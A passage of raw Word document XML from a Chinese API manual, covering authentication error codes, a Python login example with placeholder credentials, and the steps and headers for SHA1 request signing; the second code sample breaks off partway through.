          </w:tcPr>
          <w:p w14:paraId="7FC8D419" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sign请求头不能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="50967916" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="333AC7F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>AUTH_SIGN_FAILED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71151368" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>验证签名失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="113CABDF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37B02805" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>AUTH_VERIFY_JWT_FAILED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BFC1849" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>验证jwt失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4573A19F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F9A4D85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>INVALID_JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D9CDA68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>非法的jwt串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31C09BB5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="000C2270" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>HEADER_NULL_AUTHORIZATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C91D5B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>authorization请求头不能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55A61CA7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4522484B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>AUTH_ERROR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F3C4168" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>认证发生错误</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60A625C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61035D50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>#! /usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> __future__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> absolute_import</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> httplib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashlib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">host </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>/v1/api/auth"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"application/json"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"dev@xx.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"abc@123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    json_body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> json.dumps(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.request(method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"POST"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>, url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>url, body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>json_body, headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    res </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> json.loads(res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591FBE19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="请求签名"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>请求签名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CC9E79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>请求业务api，对请求参数有对应的参数签名验证，签名步骤如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E8562F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>通过登录认证步骤获得jwt、comId、signKey；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193F14D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>生成请求的timestamp；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240ED4FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>对于get请求，将请求参数按照参数名排序(自然升序)，将排序后的请求参数及值，和comId、timestamp、signKey按照以下形式拼接，得到string-to-sign</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>格式：{comId}{key1value1key2value2}{timestamp}{signKey}；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680DF527" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>对于put/post/delete请求，将body中的json作为参数，按照以下形式拼接，得到string-to-sign</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>格式：{comId}{body}{timestamp}{signKey}；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A82D40C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>对string-to-sign进行Hash，得到sign字符串。Hash算法使用SHA1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080DCC5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>组装请求头，通过http header传递以下参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1508"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2CA2B7C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465FD4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27B353EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25A7ACF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0F8796FA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7971FEEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="254DA091" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>公司id，认证返回</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E15A5D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>59080851823593e1a80b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3F71C98C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FB7A9F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23FF7A70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>时间戳</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B08E625" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1522037099</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="26494BF3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B4DCADE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sign</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="426C534E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>签名，计算的签名串</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50C4BB11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>450af724f3e1c6bf8c8f41f715a1b2daf8e2f105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="43E18764" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64F37BC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BE0343E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>认证信息，包含认证的jwt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13411C26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Bearer ${jwt}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E13D9E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9B2CD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>from __future__ import absolute_import</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import httplib</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import json</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import hashlib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def send_request(method, url, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    login_result = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign_key = login_result.get("data").get("signKey")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    jwt = login_result.get("data").get("jwt")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    comid = login_result.get("data").get("comId")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ts = int(time.time())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(data.keys())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(data.get(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
